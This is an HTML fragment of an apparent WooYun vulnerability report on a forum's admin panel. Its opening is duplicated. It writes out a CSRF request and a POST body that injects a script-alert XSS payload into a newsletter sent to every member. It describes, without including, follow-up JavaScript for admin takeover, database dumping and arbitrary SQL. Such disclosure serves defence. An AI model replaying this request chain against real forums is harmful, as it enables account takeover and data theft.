<p>首先是一个CSRF:</p><p>url:/admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=&regdatebefore=&regdateafter=&postshigher=&postslower=&regip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lower[credits]=&lower[extcredits1]=&lower[extcredits2]=&higher[credits]=&higher[extcredits1]=&higher[extcredits2]=</p><p>POST内容:</p><p>formhash=&scrolltop=&anchor=&subject=%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&message=test&sendvia=pm&pertask=100&newslettersubmit=%E6%8F%90%E4%BA%A4</p><p>一个简单的POC,1-20行</p><p data-indent="1"><img src="http://static.wooyun.org/wooyun/upload/201501/2318062027fbff59bda5a4a6128d4fc9329ce3ec.png" alt="1.png"><br></p><p><br>成功提交<br><br></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/2318070322bd1e70c19c7314d6146d3e334300f5.png" alt="2.png"...
<p>首先是一个CSRF:</p><p>url:/admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=&regdatebefore=&regdateafter=&postshigher=&postslower=&regip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lower[credits]=&lower[extcredits1]=&lower[extcredits2]=&higher[credits]=&higher[extcredits1]=&higher[extcredits2]=</p><p>POST内容:</p><p>formhash=&scrolltop=&anchor=&subject=%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&message=test&sendvia=pm&pertask=100&newslettersubmit=%E6%8F%90%E4%BA%A4</p><p>一个简单的POC,1-20行</p><p data-indent="1"><img src="http://static.wooyun.org/wooyun/upload/201501/2318062027fbff59bda5a4a6128d4fc9329ce3ec.png" alt="1.png"><br></p><p><br>成功提交<br><br></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/2318070322bd1e70c19c7314d6146d3e334300f5.png" alt="2.png" width="600"></p><p><br><br>前台所有成员均受到被X影响<br><br></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/23180735fff2838718cc68a78132a44237ec90a5.png" alt="3.png" width="600"></p><p><br><br><br><br>那下面说一下怎么利用这个XSS,其实这个XSS是很好利用的,既然我们有了XSS,后台任意操作只需要拿到formhash即可,那么给出POC:25-215行</p><p><br></p><p>只要把这段js代码通过CSRF发送给论坛全部会员(包括所有管理),即可成功利用脱裤。<br><br>并且可以执行任意sql<br><br></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/23183023479756dffd7d7d3c0c615158a2797b13.png" alt="5.png" width="600"></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/23183109046c9bca94364ebb495b51a57b9a2feb.png" alt="6.png" width="600"></img></p>
